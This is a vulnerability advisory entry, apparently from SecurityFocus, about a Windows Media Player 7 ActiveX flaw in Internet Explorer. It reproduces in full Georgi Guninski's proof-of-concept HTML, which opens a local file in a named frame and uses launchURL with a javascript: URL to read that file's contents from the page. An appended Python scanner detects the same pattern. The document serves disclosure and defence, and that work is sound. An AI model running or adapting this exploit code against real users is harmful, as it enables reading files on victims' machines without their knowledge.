
source: https://www.securityfocus.com/bid/2167/info

Windows Media Player is an application for viewing digital audio and video content. It can be embedded in web pages as an ActiveX control.

It is possible to execute a javascript: URL from within the Windows Media Player ActiveX control embedded in HTML. The script can be executed in arbitrary, already open frames, which are specified within the ActiveX control. By doing this, an attacker can take over the frame's DOM (document object model), bypassing security restrictions. Exploitation requires a specially crafted web page that the victim visits.

An attacker exploiting this vulnerability can read files on the user's filesystem and reportedly execute arbitrary programs on the victim host.

<HTML>
<HEAD>
<TITLE>
Windows Media Player 7 and IE vulnerability - executing arbitrary programs
</TITLE>
</HEAD>
<BODY>
<H3>
Windows Media Player 7 and IE vulnerability - executing arbitrary programs
</H3>
<BR>
<p>Legal Notice:
<br>This Advisory and Demonstration is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified. You may not modify it and distribute it or distribute parts
of it without the author's written permission.
<p>Disclaimer:
<br>The opinions expressed in this advisory and program are my own and
not of any company.
<br>The usual standard disclaimer applies, especially the fact that Georgi
Guninski
<br>is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this advisory or program.
<br>Georgi Guninski, bears no responsibility for content or misuse of this
advisory or program or any derivatives thereof.
<BR>
Read the <A HREF="wmp7ie-desc.html">Advisory</A> for more information.
<BR>
<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" WIDTH=0 HEIGHT=0>
<PARAM NAME="defaultFrame" value="georgi">
</object>
<SCRIPT>
alert("This page reads C:\\test.txt");
window.open("file://c:/test.txt","georgi");
function f()
{
document.o1.object.launchURL("javascript:alert(document.body.innerText)");
}
setTimeout("f()",1000);
</SCRIPT>
<BR>
<center>(C) Copyright 2000 Georgi Guninski</center>
<BR>
<center>
| <a href="http://www.guninski.com">Home</a> |
<a href="browsers.html">Internet Explorer</a> |
<a href="win2k.html">Windows 2000</a> |
<a href="exploit.html">AIX</a> |
<a href="netscape.html">Netscape</a> |
<a href="greets.html">Greets</a> |
<a href="index.html">More...</a> |
</center>
</BODY>
</HTML>
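
A defender-side check for the pattern this page relies on, as an added example that is not part of the original advisory or exploit file: it flags HTML that embeds the Windows Media Player control, sets its `defaultFrame` parameter, and passes a `javascript:` URL to `launchURL`. The class and function names, the marker strings and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# WMP 7 control CLSID and the launchURL("javascript:...") call, both from the page above.
WMP_CLSID = "6bf52a52-394a-11d3-b153-00c04f79faa6"
LAUNCH_JS = re.compile(r"\blaunchURL\s*\(\s*[\"']\s*javascript:", re.I)

class WmpFrameScan(HTMLParser):
    """Collects the three markers of the frame-targeted launchURL pattern."""
    def __init__(self):
        super().__init__()
        self.in_wmp = False   # inside an <object> carrying the WMP classid
        self.script = None    # text chunks of the <script> being read
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # names arrive lower-cased
        if tag == "object":
            cid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            self.in_wmp = cid == WMP_CLSID
            if self.in_wmp:
                self.findings.add("wmp-object")
        elif tag == "param" and self.in_wmp and a.get("name", "").lower() == "defaultframe":
            self.findings.add("default-frame")
        elif tag == "script":
            self.script = []

    def handle_data(self, data):
        if self.script is not None:
            self.script.append(data)

    def handle_endtag(self, tag):
        if tag == "object":
            self.in_wmp = False
        elif tag == "script" and self.script is not None:
            # Judge the whole script body once it is complete.
            if LAUNCH_JS.search("".join(self.script)):
                self.findings.add("launchurl-javascript")
            self.script = None

def scan(html):
    """Return the sorted markers found; all three together match the pattern."""
    parser = WmpFrameScan()
    parser.feed(html)
    return sorted(parser.findings)

# Constructed sample carrying all three markers (not taken from real traffic).
FLAGGED = ('<object id="p" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6">'
           '<PARAM NAME="defaultFrame" value="victim"></object>'
           '<script>document.p.object.launchURL("javascript:void(0)");</script>')
```

A page that only embeds the player yields `["wmp-object"]`; treat the full set of three markers as the signal worth alerting on.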